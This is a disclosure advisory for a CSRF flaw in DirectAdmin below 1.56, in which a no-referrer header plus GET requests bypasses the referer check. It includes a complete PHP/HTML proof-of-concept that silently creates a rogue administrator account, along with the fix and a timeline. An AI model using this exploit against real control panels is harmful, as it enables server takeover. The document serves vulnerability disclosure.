Vulnerability

Affected software: DirectAdmin versions below 1.56

Someone has reported on 2019-03-03 CSRF vulnerability in DirectAdmin, however exploit didn't work due to (enabled by default) check_referer. After analysis however, I have found other bug that allowed check_referer bypass.

If Referrer-Policy: no-referrer is set and we use GET request instead of POST, then CSRF succeeds and rouge admin account be created if someone logged in as admin to DirectAdmin follows a malicious link.

Exploit

It requires user interaction, but can be automated.

<?php
header("Referrer-Policy: no-referrer");
?>
<html>
  <body>
    <form action="https://HOST:2223/CMD_ACCOUNT_ADMIN" method="GET">
      <input type="hidden" name="fakeusernameremembered" value="" />
      <input type="hidden" name="fakepasswordremembered" value="" />
      <input type="hidden" name="action" value="create" />
      <input type="hidden" name="username" value="newadmin" />
      <input type="hidden" name="email" value="user@example.org" />
      <input type="hidden" name="passwd" value="password" />
      <input type="hidden" name="passwd2" value="password" />
      <input type="hidden" name="notify" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Solution

Update DirectAdmin to version 1.56 or later.

Timeline

  • 2019-03-?? - Vulnerability reported to vendor (I no longer have original report).
  • 2019-03-?? - Response from vendor.
  • 2019-03-18 - DirectAdmin version 1.56 released with vulnerability fixed.